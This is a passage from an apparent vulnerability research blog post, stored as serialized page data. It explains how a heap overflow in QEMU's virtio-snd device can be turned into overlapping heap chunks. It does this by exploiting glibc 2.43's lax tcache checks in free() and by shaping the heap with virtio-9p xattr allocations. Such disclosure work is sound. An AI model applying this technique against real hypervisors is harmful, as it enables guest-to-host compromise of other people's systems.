",{"type":25,"tag":216,"props":130796,"children":130797},{"style":6953},[130798],{"type":31,"value":266},{"type":25,"tag":216,"props":130800,"children":130801},{"style":7047},[130802],{"type":31,"value":130803}," chunksize",{"type":25,"tag":216,"props":130805,"children":130806},{"style":6964},[130807],{"type":31,"value":130522},{"type":25,"tag":216,"props":130809,"children":130810},{"class":6922,"line":7244},[130811],{"type":25,"tag":216,"props":130812,"children":130813},{"emptyLinePlaceholder":16},[130814],{"type":31,"value":7642},{"type":25,"tag":216,"props":130816,"children":130817},{"class":6922,"line":7257},[130818],{"type":25,"tag":216,"props":130819,"children":130820},{"style":6927},[130821],{"type":31,"value":130822},"  /* Little security check which won't hurt performance: the\n",{"type":25,"tag":216,"props":130824,"children":130825},{"class":6922,"line":7275},[130826],{"type":25,"tag":216,"props":130827,"children":130828},{"style":6927},[130829],{"type":31,"value":130830},"     allocator never wraps around at the end of the address space.\n",{"type":25,"tag":216,"props":130832,"children":130833},{"class":6922,"line":7296},[130834],{"type":25,"tag":216,"props":130835,"children":130836},{"style":6927},[130837],{"type":31,"value":130838},"     Therefore we can exclude some size values which might appear\n",{"type":25,"tag":216,"props":130840,"children":130841},{"class":6922,"line":7305},[130842],{"type":25,"tag":216,"props":130843,"children":130844},{"style":6927},[130845],{"type":31,"value":130846},"     here by accident or by \"design\" from some intruder.  */\n",{"type":25,"tag":216,"props":130848,"children":130849},{"class":6922,"line":7557},[130850,130854,130858,130863,130868,130873,130878,130882,130886,130890,130894,130898,130903,130907],{"type":25,"tag":216,"props":130851,"children":130852},{"style":6973},[130853],{"type":31,"value":35356},{"type":25,"tag":216,"props":130855,"children":130856},{"style":6964},[130857],{"type":31,"value":7016},{"type":25,"tag":216,"props":130859,"children":130860},{"style":7047},[130861],{"type":31,"value":130862},"__builtin_expect",{"type":25,"tag":216,"props":130864,"children":130865},{"style":6964},[130866],{"type":31,"value":130867}," ((",{"type":25,"tag":216,"props":130869,"children":130870},{"style":6936},[130871],{"type":31,"value":130872},"uintptr_t",{"type":25,"tag":216,"props":130874,"children":130875},{"style":6964},[130876],{"type":31,"value":130877},") p ",{"type":25,"tag":216,"props":130879,"children":130880},{"style":6953},[130881],{"type":31,"value":5902},{"type":25,"tag":216,"props":130883,"children":130884},{"style":6964},[130885],{"type":31,"value":7016},{"type":25,"tag":216,"props":130887,"children":130888},{"style":6936},[130889],{"type":31,"value":130872},{"type":25,"tag":216,"props":130891,"children":130892},{"style":6964},[130893],{"type":31,"value":7036},{"type":25,"tag":216,"props":130895,"children":130896},{"style":6953},[130897],{"type":31,"value":8276},{"type":25,"tag":216,"props":130899,"children":130900},{"style":6964},[130901],{"type":31,"value":130902},"size, ",{"type":25,"tag":216,"props":130904,"children":130905},{"style":6989},[130906],{"type":31,"value":1882},{"type":25,"tag":216,"props":130908,"children":130909},{"style":6964},[130910],{"type":31,"value":7107},{"type":25,"tag":216,"props":130912,"children":130913},{"class":6922,"line":7574},[130914,130919,130924,130928,130933,130938,130942],{"type":25,"tag":216,"props":130915,"children":130916},{"style":6953},[130917],{"type":31,"value":130918},"      ||",{"type":25,"tag":216,"props":130920,"children":130921},{"style":7047},[130922],{"type":31,"value":130923}," __builtin_expect",{"type":25,"tag":216,"props":130925,"children":130926},{"style":6964},[130927],{"type":31,"value":7016},{"type":25,"tag":216,"props":130929,"children":130930},{"style":7047},[130931],{"type":31,"value":130932},"misaligned_chunk",{"type":25,"tag":216,"props":130934,"children":130935},{"style":6964},[130936],{"type":31,"value":130937}," (p), ",{"type":25,"tag":216,"props":130939,"children":130940},{"style":6989},[130941],{"type":31,"value":1882},{"type":25,"tag":216,"props":130943,"children":130944},{"style":6964},[130945],{"type":31,"value":23672},{"type":25,"tag":216,"props":130947,"children":130948},{"class":6922,"line":7591},[130949,130954,130958,130963],{"type":25,"tag":216,"props":130950,"children":130951},{"style":7047},[130952],{"type":31,"value":130953},"    malloc_printerr",{"type":25,"tag":216,"props":130955,"children":130956},{"style":6964},[130957],{"type":31,"value":7016},{"type":25,"tag":216,"props":130959,"children":130960},{"style":8205},[130961],{"type":31,"value":130962},"\"free(): invalid pointer\"",{"type":25,"tag":216,"props":130964,"children":130965},{"style":6964},[130966],{"type":31,"value":7797},{"type":25,"tag":216,"props":130968,"children":130969},{"class":6922,"line":7604},[130970],{"type":25,"tag":216,"props":130971,"children":130972},{"style":6927},[130973],{"type":31,"value":130974},"  /* We know that each chunk is at least MINSIZE bytes in size or a\n",{"type":25,"tag":216,"props":130976,"children":130977},{"class":6922,"line":7613},[130978],{"type":25,"tag":216,"props":130979,"children":130980},{"style":6927},[130981],{"type":31,"value":130982},"     multiple of MALLOC_ALIGNMENT.  */\n",{"type":25,"tag":216,"props":130984,"children":130985},{"class":6922,"line":7636},[130986,130990,130994,130999,131004,131008,131013,131017,131021,131026],{"type":25,"tag":216,"props":130987,"children":130988},{"style":6973},[130989],{"type":31,"value":35356},{"type":25,"tag":216,"props":130991,"children":130992},{"style":6964},[130993],{"type":31,"value":7016},{"type":25,"tag":216,"props":130995,"children":130996},{"style":7047},[130997],{"type":31,"value":130998},"__glibc_unlikely",{"type":25,"tag":216,"props":131000,"children":131001},{"style":6964},[131002],{"type":31,"value":131003}," (size ",{"type":25,"tag":216,"props":131005,"children":131006},{"style":6953},[131007],{"type":31,"value":9757},{"type":25,"tag":216,"props":131009,"children":131010},{"style":6964},[131011],{"type":31,"value":131012}," MINSIZE ",{"type":25,"tag":216,"props":131014,"children":131015},{"style":6953},[131016],{"type":31,"value":26364},{"type":25,"tag":216,"props":131018,"children":131019},{"style":6953},[131020],{"type":31,"value":16820},{"type":25,"tag":216,"props":131022,"children":131023},{"style":7047},[131024],{"type":31,"value":131025},"aligned_OK",{"type":25,"tag":216,"props":131027,"children":131028},{"style":6964},[131029],{"type":31,"value":131030}," (size)))\n",{"type":25,"tag":216,"props":131032,"children":131033},{"class":6922,"line":7645},[131034,131038,131042,131047],{"type":25,"tag":216,"props":131035,"children":131036},{"style":7047},[131037],{"type":31,"value":130953},{"type":25,"tag":216,"props":131039,"children":131040},{"style":6964},[131041],{"type":31,"value":7016},{"type":25,"tag":216,"props":131043,"children":131044},{"style":8205},[131045],{"type":31,"value":131046},"\"free(): invalid size\"",{"type":25,"tag":216,"props":131048,"children":131049},{"style":6964},[131050],{"type":31,"value":7797},{"type":25,"tag":216,"props":131052,"children":131053},{"class":6922,"line":7654},[131054],{"type":25,"tag":216,"props":131055,"children":131056},{"emptyLinePlaceholder":16},[131057],{"type":31,"value":7642},{"type":25,"tag":216,"props":131059,"children":131060},{"class":6922,"line":7722},[131061,131066],{"type":25,"tag":216,"props":131062,"children":131063},{"style":7047},[131064],{"type":31,"value":131065},"  check_inuse_chunk",{"type":25,"tag":216,"props":131067,"children":131068},{"style":6964},[131069],{"type":31,"value":131070},"(av, p);\n",{"type":25,"tag":216,"props":131072,"children":131073},{"class":6922,"line":7730},[131074],{"type":25,"tag":216,"props":131075,"children":131076},{"emptyLinePlaceholder":16},[131077],{"type":31,"value":7642},{"type":25,"tag":216,"props":131079,"children":131080},{"class":6922,"line":7760},[131081],{"type":25,"tag":216,"props":131082,"children":131083},{"style":6964},[131084],{"type":31,"value":131085},"  [...]\n",{"type":25,"tag":38,"props":131087,"children":131088},{},[131089],{"type":31,"value":131090},"The first check verifies that the chunk pointer itself is not misaligned. Since we do not control the pointer, this is not particularly relevant here.",{"type":25,"tag":38,"props":131092,"children":131093},{},[131094,131096,131101,131103,131108,131110,131115,131117,131122],{"type":31,"value":131095},"The next check, however, ensures that the ",{"type":25,"tag":82,"props":131097,"children":131099},{"className":131098},[],[131100],{"type":31,"value":128192},{"type":31,"value":131102}," field is 16-byte aligned. This means that the low byte we overwrite in ",{"type":25,"tag":82,"props":131104,"children":131106},{"className":131105},[],[131107],{"type":31,"value":128192},{"type":31,"value":131109}," must preserve alignment while also avoiding the ",{"type":25,"tag":82,"props":131111,"children":131113},{"className":131112},[],[131114],{"type":31,"value":130361},{"type":31,"value":131116}," bit. Under those constraints, exploiting the bug through ",{"type":25,"tag":82,"props":131118,"children":131120},{"className":131119},[],[131121],{"type":31,"value":128192},{"type":31,"value":131123}," corruption looked very unreliable at first.",{"type":25,"tag":38,"props":131125,"children":131126},{},[131127],{"type":31,"value":131128},"Still, we wanted to check how this behaved in the latest glibc 2.43:",{"type":25,"tag":206,"props":131130,"children":131132},{"code":131131,"language":2254,"meta":7,"className":20473,"style":7},"void\n__libc_free (void *mem)\n{\n  mchunkptr p;\n\n  p = mem2chunk (mem);\n\n  INTERNAL_SIZE_T size = chunksize (p);\n\n  if (__glibc_unlikely (misaligned_chunk (p)))\n    return malloc_printerr_tail (\"free(): invalid pointer\");\n\n#if USE_TCACHE\n  if (__glibc_likely (size \u003C mp_.tcache_max_bytes))\n    {\n      [...]\n\n      return tcache_put (p, tc_idx);\n    }\n",[131133],{"type":25,"tag":82,"props":131134,"children":131135},{"__ignoreMap":7},[131136,131144,131171,131178,131185,131192,131211,131218,131238,131245,131273,131297,131304,131317,131359,131366,131374,131381,131398],{"type":25,"tag":216,"props":131137,"children":131138},{"class":6922,"line":6923},[131139],{"type":25,"tag":216,"props":131140,"children":131141},{"style":6936},[131142],{"type":31,"value":131143},"void\n",{"type":25,"tag":216,"props":131145,"children":131146},{"class":6922,"line":6769},[131147,131151,131155,131159,131163,131167],{"type":25,"tag":216,"props":131148,"children":131149},{"style":7047},[131150],{"type":31,"value":130409},{"type":25,"tag":216,"props":131152,"children":131153},{"style":6964},[131154],{"type":31,"value":7016},{"type":25,"tag":216,"props":131156,"children":131157},{"style":6936},[131158],{"type":31,"value":55595},{"type":25,"tag":216,"props":131160,"children":131161},{"style":6953},[131162],{"type":31,"value":13773},{"type":25,"tag":216,"props":131164,"children":131165},{"style":6947},[131166],{"type":31,"value":44628},{"type":25,"tag":216,"props":131168,"children":131169},{"style":6964},[131170],{"type":31,"value":7107},{"type":25,"tag":216,"props":131172,"children":131173},{"class":6922,"line":6778},[131174],{"type":25,"tag":216,"props":131175,"children":131176},{"style":6964},[131177],{"type":31,"value":14836},{"type":25,"tag":216,"props":131179,"children":131180},{"class":6922,"line":7005},[131181],{"type":25,"tag":216,"props":131182,"children":131183},{"style":6964},[131184],{"type":31,"value":130452},{"type":25,"tag":216,"props":131186,"children":131187},{"class":6922,"line":7110},[131188],{"type":25,"tag":216,"props":131189,"children":131190},{"emptyLinePlaceholder":16},[131191],{"type":31,"value":7642},{"type":25,"tag":216,"props":131193,"children":131194},{"class":6922,"line":7216},[131195,131199,131203,131207],{"type":25,"tag":216,"props":131196,"children":131197},{"style":6964},[131198],{"type":31,"value":130467},{"type":25,"tag":216,"props":131200,"children":131201},{"style":6953},[131202],{"type":31,"value":266},{"type":25,"tag":216,"props":131204,"children":131205},{"style":7047},[131206],{"type":31,"value":130476},{"type":25,"tag":216,"props":131208,"children":131209},{"style":6964},[131210],{"type":31,"value":130481},{"type":25,"tag":216,"props":131212,"children":131213},{"class":6922,"line":7244},[131214],{"type":25,"tag":216,"props":131215,"children":131216},{"emptyLinePlaceholder":16},[131217],{"type":31,"value":7642},{"type":25,"tag":216,"props":131219,"children":131220},{"class":6922,"line":7257},[131221,131226,131230,131234],{"type":25,"tag":216,"props":131222,"children":131223},{"style":6964},[131224],{"type":31,"value":131225},"  INTERNAL_SIZE_T size ",{"type":25,"tag":216,"props":131227,"children":131228},{"style":6953},[131229],{"type":31,"value":266},{"type":25,"tag":216,"props":131231,"children":131232},{"style":7047},[131233],{"type":31,"value":130803},{"type":25,"tag":216,"props":131235,"children":131236},{"style":6964},[131237],{"type":31,"value":130522},{"type":25,"tag":216,"props":131239,"children":131240},{"class":6922,"line":7275},[131241],{"type":25,"tag":216,"props":131242,"children":131243},{"emptyLinePlaceholder":16},[131244],{"type":31,"value":7642},{"type":25,"tag":216,"props":131246,"children":131247},{"class":6922,"line":7296},[131248,131252,131256,131260,131264,131268],{"type":25,"tag":216,"props":131249,"children":131250},{"style":6973},[131251],{"type":31,"value":35356},{"type":25,"tag":216,"props":131253,"children":131254},{"style":6964},[131255],{"type":31,"value":7016},{"type":25,"tag":216,"props":131257,"children":131258},{"style":7047},[131259],{"type":31,"value":130998},{"type":25,"tag":216,"props":131261,"children":131262},{"style":6964},[131263],{"type":31,"value":7016},{"type":25,"tag":216,"props":131265,"children":131266},{"style":7047},[131267],{"type":31,"value":130932},{"type":25,"tag":216,"props":131269,"children":131270},{"style":6964},[131271],{"type":31,"value":131272}," (p)))\n",{"type":25,"tag":216,"props":131274,"children":131275},{"class":6922,"line":7305},[131276,131280,131285,131289,131293],{"type":25,"tag":216,"props":131277,"children":131278},{"style":6973},[131279],{"type":31,"value":20947},{"type":25,"tag":216,"props":131281,"children":131282},{"style":7047},[131283],{"type":31,"value":131284}," malloc_printerr_tail",{"type":25,"tag":216,"props":131286,"children":131287},{"style":6964},[131288],{"type":31,"value":7016},{"type":25,"tag":216,"props":131290,"children":131291},{"style":8205},[131292],{"type":31,"value":130962},{"type":25,"tag":216,"props":131294,"children":131295},{"style":6964},[131296],{"type":31,"value":7797},{"type":25,"tag":216,"props":131298,"children":131299},{"class":6922,"line":7557},[131300],{"type":25,"tag":216,"props":131301,"children":131302},{"emptyLinePlaceholder":16},[131303],{"type":31,"value":7642},{"type":25,"tag":216,"props":131305,"children":131306},{"class":6922,"line":7574},[131307,131312],{"type":25,"tag":216,"props":131308,"children":131309},{"style":6973},[131310],{"type":31,"value":131311},"#if",{"type":25,"tag":216,"props":131313,"children":131314},{"style":7047},[131315],{"type":31,"value":131316}," USE_TCACHE\n",{"type":25,"tag":216,"props":131318,"children":131319},{"class":6922,"line":7591},[131320,131324,131328,131333,131337,131341,131346,131350,131355],{"type":25,"tag":216,"props":131321,"children":131322},{"style":6973},[131323],{"type":31,"value":35356},{"type":25,"tag":216,"props":131325,"children":131326},{"style":6964},[131327],{"type":31,"value":7016},{"type":25,"tag":216,"props":131329,"children":131330},{"style":7047},[131331],{"type":31,"value":131332},"__glibc_likely",{"type":25,"tag":216,"props":131334,"children":131335},{"style":6964},[131336],{"type":31,"value":131003},{"type":25,"tag":216,"props":131338,"children":131339},{"style":6953},[131340],{"type":31,"value":9757},{"type":25,"tag":216,"props":131342,"children":131343},{"style":6947},[131344],{"type":31,"value":131345}," mp_",{"type":25,"tag":216,"props":131347,"children":131348},{"style":6964},[131349],{"type":31,"value":179},{"type":25,"tag":216,"props":131351,"children":131352},{"style":6947},[131353],{"type":31,"value":131354},"tcache_max_bytes",{"type":25,"tag":216,"props":131356,"children":131357},{"style":6964},[131358],{"type":31,"value":23672},{"type":25,"tag":216,"props":131360,"children":131361},{"class":6922,"line":7604},[131362],{"type":25,"tag":216,"props":131363,"children":131364},{"style":6964},[131365],{"type":31,"value":33147},{"type":25,"tag":216,"props":131367,"children":131368},{"class":6922,"line":7613},[131369],{"type":25,"tag":216,"props":131370,"children":131371},{"style":6964},[131372],{"type":31,"value":131373},"      [...]\n",{"type":25,"tag":216,"props":131375,"children":131376},{"class":6922,"line":7636},[131377],{"type":25,"tag":216,"props":131378,"children":131379},{"emptyLinePlaceholder":16},[131380],{"type":31,"value":7642},{"type":25,"tag":216,"props":131382,"children":131383},{"class":6922,"line":7645},[131384,131388,131393],{"type":25,"tag":216,"props":131385,"children":131386},{"style":6973},[131387],{"type":31,"value":43320},{"type":25,"tag":216,"props":131389,"children":131390},{"style":7047},[131391],{"type":31,"value":131392}," tcache_put",{"type":25,"tag":216,"props":131394,"children":131395},{"style":6964},[131396],{"type":31,"value":131397}," (p, tc_idx);\n",{"type":25,"tag":216,"props":131399,"children":131400},{"class":6922,"line":7654},[131401],{"type":25,"tag":216,"props":131402,"children":131403},{"style":6964},[131404],{"type":31,"value":7311},{"type":25,"tag":38,"props":131406,"children":131407},{},[131408,131410,131415],{"type":31,"value":131409},"It is easy to notice that, when taking the tcache path, there are essentially no integrity checks on the ",{"type":25,"tag":82,"props":131411,"children":131413},{"className":131412},[],[131414],{"type":31,"value":128192},{"type":31,"value":131416}," field beyond the basic size-range decision needed to determine whether the chunk fits into tcache. The only explicit check here is that the pointer itself is aligned, which is not something we care about.",{"type":25,"tag":38,"props":131418,"children":131419},{},[131420,131422,131428,131429,131434],{"type":31,"value":131421},"In fact, even the version prior to 2.43 still performed more validation on the tcache path by calling ",{"type":25,"tag":82,"props":131423,"children":131425},{"className":131424},[],[131426],{"type":31,"value":131427},"check_inuse_chunk",{"type":31,"value":7016},{"type":25,"tag":82,"props":131430,"children":131432},{"className":131431},[],[131433],{"type":31,"value":128320},{"type":31,"value":27903},{"type":25,"tag":206,"props":131436,"children":131438},{"code":131437,"language":2254,"meta":7,"className":20473,"style":7},"void\n__libc_free (void *mem)\n{\n  mchunkptr p;\n\n  p = mem2chunk (mem);\n\n  INTERNAL_SIZE_T size = chunksize (p);\n\n  if (__glibc_unlikely (misaligned_chunk (p)))\n    return malloc_printerr_tail (\"free(): invalid pointer\");\n\n  check_inuse_chunk (arena_for_chunk (p), p);             // [1]\n\n#if USE_TCACHE\n  if (__glibc_likely (size \u003C mp_.tcache_max_bytes && tcache != NULL))\n  [...]\n",[131439],{"type":25,"tag":82,"props":131440,"children":131441},{"__ignoreMap":7},[131442,131449,131476,131483,131490,131497,131516,131523,131542,131549,131576,131599,131606,131632,131639,131650,131707],{"type":25,"tag":216,"props":131443,"children":131444},{"class":6922,"line":6923},[131445],{"type":25,"tag":216,"props":131446,"children":131447},{"style":6936},[131448],{"type":31,"value":131143},{"type":25,"tag":216,"props":131450,"children":131451},{"class":6922,"line":6769},[131452,131456,131460,131464,131468,131472],{"type":25,"tag":216,"props":131453,"children":131454},{"style":7047},[131455],{"type":31,"value":130409},{"type":25,"tag":216,"props":131457,"children":131458},{"style":6964},[131459],{"type":31,"value":7016},{"type":25,"tag":216,"props":131461,"children":131462},{"style":6936},[131463],{"type":31,"value":55595},{"type":25,"tag":216,"props":131465,"children":131466},{"style":6953},[131467],{"type":31,"value":13773},{"type":25,"tag":216,"props":131469,"children":131470},{"style":6947},[131471],{"type":31,"value":44628},{"type":25,"tag":216,"props":131473,"children":131474},{"style":6964},[131475],{"type":31,"value":7107},{"type":25,"tag":216,"props":131477,"children":131478},{"class":6922,"line":6778},[131479],{"type":25,"tag":216,"props":131480,"children":131481},{"style":6964},[131482],{"type":31,"value":14836},{"type":25,"tag":216,"props":131484,"children":131485},{"class":6922,"line":7005},[131486],{"type":25,"tag":216,"props":131487,"children":131488},{"style":6964},[131489],{"type":31,"value":130452},{"type":25,"tag":216,"props":131491,"children":131492},{"class":6922,"line":7110},[131493],{"type":25,"tag":216,"props":131494,"children":131495},{"emptyLinePlaceholder":16},[131496],{"type":31,"value":7642},{"type":25,"tag":216,"props":131498,"children":131499},{"class":6922,"line":7216},[131500,131504,131508,131512],{"type":25,"tag":216,"props":131501,"children":131502},{"style":6964},[131503],{"type":31,"value":130467},{"type":25,"tag":216,"props":131505,"children":131506},{"style":6953},[131507],{"type":31,"value":266},{"type":25,"tag":216,"props":131509,"children":131510},{"style":7047},[131511],{"type":31,"value":130476},{"type":25,"tag":216,"props":131513,"children":131514},{"style":6964},[131515],{"type":31,"value":130481},{"type":25,"tag":216,"props":131517,"children":131518},{"class":6922,"line":7244},[131519],{"type":25,"tag":216,"props":131520,"children":131521},{"emptyLinePlaceholder":16},[131522],{"type":31,"value":7642},{"type":25,"tag":216,"props":131524,"children":131525},{"class":6922,"line":7257},[131526,131530,131534,131538],{"type":25,"tag":216,"props":131527,"children":131528},{"style":6964},[131529],{"type":31,"value":131225},{"type":25,"tag":216,"props":131531,"children":131532},{"style":6953},[131533],{"type":31,"value":266},{"type":25,"tag":216,"props":131535,"children":131536},{"style":7047},[131537],{"type":31,"value":130803},{"type":25,"tag":216,"props":131539,"children":131540},{"style":6964},[131541],{"type":31,"value":130522},{"type":25,"tag":216,"props":131543,"children":131544},{"class":6922,"line":7275},[131545],{"type":25,"tag":216,"props":131546,"children":131547},{"emptyLinePlaceholder":16},[131548],{"type":31,"value":7642},{"type":25,"tag":216,"props":131550,"children":131551},{"class":6922,"line":7296},[131552,131556,131560,131564,131568,131572],{"type":25,"tag":216,"props":131553,"children":131554},{"style":6973},[131555],{"type":31,"value":35356},{"type":25,"tag":216,"props":131557,"children":131558},{"style":6964},[131559],{"type":31,"value":7016},{"type":25,"tag":216,"props":131561,"children":131562},{"style":7047},[131563],{"type":31,"value":130998},{"type":25,"tag":216,"props":131565,"children":131566},{"style":6964},[131567],{"type":31,"value":7016},{"type":25,"tag":216,"props":131569,"children":131570},{"style":7047},[131571],{"type":31,"value":130932},{"type":25,"tag":216,"props":131573,"children":131574},{"style":6964},[131575],{"type":31,"value":131272},{"type":25,"tag":216,"props":131577,"children":131578},{"class":6922,"line":7305},[131579,131583,131587,131591,131595],{"type":25,"tag":216,"props":131580,"children":131581},{"style":6973},[131582],{"type":31,"value":20947},{"type":25,"tag":216,"props":131584,"children":131585},{"style":7047},[131586],{"type":31,"value":131284},{"type":25,"tag":216,"props":131588,"children":131589},{"style":6964},[131590],{"type":31,"value":7016},{"type":25,"tag":216,"props":131592,"children":131593},{"style":8205},[131594],{"type":31,"value":130962},{"type":25,"tag":216,"props":131596,"children":131597},{"style":6964},[131598],{"type":31,"value":7797},{"type":25,"tag":216,"props":131600,"children":131601},{"class":6922,"line":7557},[131602],{"type":25,"tag":216,"props":131603,"children":131604},{"emptyLinePlaceholder":16},[131605],{"type":31,"value":7642},{"type":25,"tag":216,"props":131607,"children":131608},{"class":6922,"line":7574},[131609,131613,131617,131622,131627],{"type":25,"tag":216,"props":131610,"children":131611},{"style":7047},[131612],{"type":31,"value":131065},{"type":25,"tag":216,"props":131614,"children":131615},{"style":6964},[131616],{"type":31,"value":7016},{"type":25,"tag":216,"props":131618,"children":131619},{"style":7047},[131620],{"type":31,"value":131621},"arena_for_chunk",{"type":25,"tag":216,"props":131623,"children":131624},{"style":6964},[131625],{"type":31,"value":131626}," (p), p);",{"type":25,"tag":216,"props":131628,"children":131629},{"style":6927},[131630],{"type":31,"value":131631},"             // [1]\n",{"type":25,"tag":216,"props":131633,"children":131634},{"class":6922,"line":7591},[131635],{"type":25,"tag":216,"props":131636,"children":131637},{"emptyLinePlaceholder":16},[131638],{"type":31,"value":7642},{"type":25,"tag":216,"props":131640,"children":131641},{"class":6922,"line":7604},[131642,131646],{"type":25,"tag":216,"props":131643,"children":131644},{"style":6973},[131645],{"type":31,"value":131311},{"type":25,"tag":216,"props":131647,"children":131648},{"style":7047},[131649],{"type":31,"value":131316},{"type":25,"tag":216,"props":131651,"children":131652},{"class":6922,"line":7613},[131653,131657,131661,131665,131669,131673,131677,131681,131685,131689,131694,131698,131703],{"type":25,"tag":216,"props":131654,"children":131655},{"style":6973},[131656],{"type":31,"value":35356},{"type":25,"tag":216,"props":131658,"children":131659},{"style":6964},[131660],{"type":31,"value":7016},{"type":25,"tag":216,"props":131662,"children":131663},{"style":7047},[131664],{"type":31,"value":131332},{"type":25,"tag":216,"props":131666,"children":131667},{"style":6964},[131668],{"type":31,"value":131003},{"type":25,"tag":216,"props":131670,"children":131671},{"style":6953},[131672],{"type":31,"value":9757},{"type":25,"tag":216,"props":131674,"children":131675},{"style":6947},[131676],{"type":31,"value":131345},{"type":25,"tag":216,"props":131678,"children":131679},{"style":6964},[131680],{"type":31,"value":179},{"type":25,"tag":216,"props":131682,"children":131683},{"style":6947},[131684],{"type":31,"value":131354},{"type":25,"tag":216,"props":131686,"children":131687},{"style":6953},[131688],{"type":31,"value":18142},{"type":25,"tag":216,"props":131690,"children":131691},{"style":6964},[131692],{"type":31,"value":131693}," tcache ",{"type":25,"tag":216,"props":131695,"children":131696},{"style":6953},[131697],{"type":31,"value":19646},{"type":25,"tag":216,"props":131699,"children":131700},{"style":6936},[131701],{"type":31,"value":131702}," NULL",{"type":25,"tag":216,"props":131704,"children":131705},{"style":6964},[131706],{"type":31,"value":23672},{"type":25,"tag":216,"props":131708,"children":131709},{"class":6922,"line":7636},[131710],{"type":25,"tag":216,"props":131711,"children":131712},{"style":6964},[131713],{"type":31,"value":131085},{"type":25,"tag":38,"props":131715,"children":131716},{},[131717,131719,131724],{"type":31,"value":131718},"This means that as long as we can reliably force the corrupted chunk down the tcache path, we no longer need to worry much about integrity checks on ",{"type":25,"tag":82,"props":131720,"children":131722},{"className":131721},[],[131723],{"type":31,"value":128192},{"type":31,"value":131725},", because on the latest 2.43 glibc they are non-existent.",{"type":25,"tag":22753,"props":131727,"children":131728},{},[],{"type":25,"tag":38,"props":131730,"children":131731},{},[131732,131734,131739,131741,131747,131749,131754,131756,131762],{"type":31,"value":131733},"With that in mind, the idea we settled on was to allocate a chunk whose ",{"type":25,"tag":82,"props":131735,"children":131737},{"className":131736},[],[131738],{"type":31,"value":128192},{"type":31,"value":131740}," field was initially ",{"type":25,"tag":82,"props":131742,"children":131744},{"className":131743},[],[131745],{"type":31,"value":131746},"0x200",{"type":31,"value":131748},", then trigger the overflow and corrupt only its low byte. If the byte written is at least ",{"type":25,"tag":82,"props":131750,"children":131752},{"className":131751},[],[131753],{"type":31,"value":130369},{"type":31,"value":131755},", the resulting value would correspond to a larger, tcache-eligible, size in range ",{"type":25,"tag":82,"props":131757,"children":131759},{"className":131758},[],[131760],{"type":31,"value":131761},"[0x210, 0x2f0]",{"type":31,"value":131763},". That would let us free the chunk as an oversized entry into the tcache freelist, which we could later reclaim and overlap chunks for a better primitive.",{"type":25,"tag":38,"props":131765,"children":131766},{},[131767],{"type":31,"value":131768},"This approach gives us much better odds of success. In fact, with the stream configuration we use later, we can make this behavior reliable enough to exploit consistently.",{"type":25,"tag":606,"props":131770,"children":131772},{"id":131771},"heap-spraying",[131773],{"type":31,"value":131774},"Heap Spraying",{"type":25,"tag":38,"props":131776,"children":131777},{},[131778,131780,131785],{"type":31,"value":131779},"With that idea in mind, we now need a way to shape the heap so that a ",{"type":25,"tag":82,"props":131781,"children":131783},{"className":131782},[],[131784],{"type":31,"value":131746},{"type":31,"value":131786},"-sized chunk is placed immediately after the vulnerable virtio-snd buffer. In addition, we need to drain any existing entries from the relevant tcache freelist so that it is not full when we later free the corrupted oversized chunk.",{"type":25,"tag":38,"props":131788,"children":131789},{},[131790,131792,131797],{"type":31,"value":131791},"Unfortunately, while virtio-snd does provide some heap spraying primitives through its buffer allocations, they are fairly limited. For example, we could only allocate up to 64 buffers at a time. On top of that, ",{"type":25,"tag":82,"props":131793,"children":131795},{"className":131794},[],[131796],{"type":31,"value":128387},{"type":31,"value":131798}," is a FIFO queue, so we could not control the order in which those buffers were freed - they would always be released in the same order they were inserted.",{"type":25,"tag":38,"props":131800,"children":131801},{},[131802],{"type":31,"value":131803},"For the purposes of this blog post, we therefore enabled another virtio device to help with heap shaping.",{"type":25,"tag":630,"props":131805,"children":131807},{"id":131806},"virtio-9p",[131808],{"type":31,"value":131806},{"type":25,"tag":38,"props":131810,"children":131811},{},[131812,131817],{"type":25,"tag":82,"props":131813,"children":131815},{"className":131814},[],[131816],{"type":31,"value":131806},{"type":31,"value":131818}," is a paravirtualized filesystem device that lets the guest access a directory exported by the host through the 9P protocol. The part that interested us most was its handling of extended attributes, or xattrs.",{"type":25,"tag":38,"props":131820,"children":131821},{},[131822,131824,131830,131832,131838,131839,131845,131847,131852],{"type":31,"value":131823},"Through a ",{"type":25,"tag":82,"props":131825,"children":131827},{"className":131826},[],[131828],{"type":31,"value":131829},"P9_TXATTRCREATE",{"type":31,"value":131831}," request, we can allocate host-side buffers for both the ",{"type":25,"tag":82,"props":131833,"children":131835},{"className":131834},[],[131836],{"type":31,"value":131837},".name",{"type":31,"value":1307},{"type":25,"tag":82,"props":131840,"children":131842},{"className":131841},[],[131843],{"type":31,"value":131844},".value",{"type":31,"value":131846}," fields, with the size of ",{"type":25,"tag":82,"props":131848,"children":131850},{"className":131849},[],[131851],{"type":31,"value":131844},{"type":31,"value":131853}," being directly controlled by the guest.",{"type":25,"tag":206,"props":131855,"children":131857},{"code":131856,"language":2254,"meta":7,"className":20473,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n    int flags, rflags = 0;\n    int32_t fid;\n    uint64_t size;\n    ssize_t err = 0;\n    V9fsString name;\n    size_t offset = 7;\n    V9fsFidState *file_fidp;\n    V9fsFidState *xattr_fidp;\n    V9fsPDU *pdu = opaque;\n\n    v9fs_string_init(&name);\n    err = pdu_unmarshal(pdu, offset, \"dsqd\", &fid, &name, &size, &flags);\n    if (err \u003C 0) {\n        goto out_nofid;\n    }\n\n    [...]\n\n    if (size > P9_XATTR_SIZE_MAX) {\n        err = -E2BIG;\n        goto out_nofid;\n    }\n\n    [...]\n\n    v9fs_string_init(&xattr_fidp->fs.xattr.name);\n    v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name);\n    xattr_fidp->fs.xattr.value = g_malloc0(size);\n}\n",[131858],{"type":25,"tag":82,"props":131859,"children":131860},{"__ignoreMap":7},[131861,131903,131910,131934,131947,131958,131983,131991,132016,132033,132049,132075,132082,132103,132169,132193,132206,132213,132220,132227,132234,132254,132275,132286,132293,132300,132307,132314,132363,132419,132464],{"type":25,"tag":216,"props":131862,"children":131863},{"class":6922,"line":6923},[131864,131868,131872,131877,131882,131886,131890,131894,131899],{"type":25,"tag":216,"props":131865,"children":131866},{"style":6936},[131867],{"type":31,"value":55013},{"type":25,"tag":216,"props":131869,"children":131870},{"style":6936},[131871],{"type":31,"value":55018},{"type":25,"tag":216,"props":131873,"children":131874},{"style":6964},[131875],{"type":31,"value":131876}," coroutine_fn 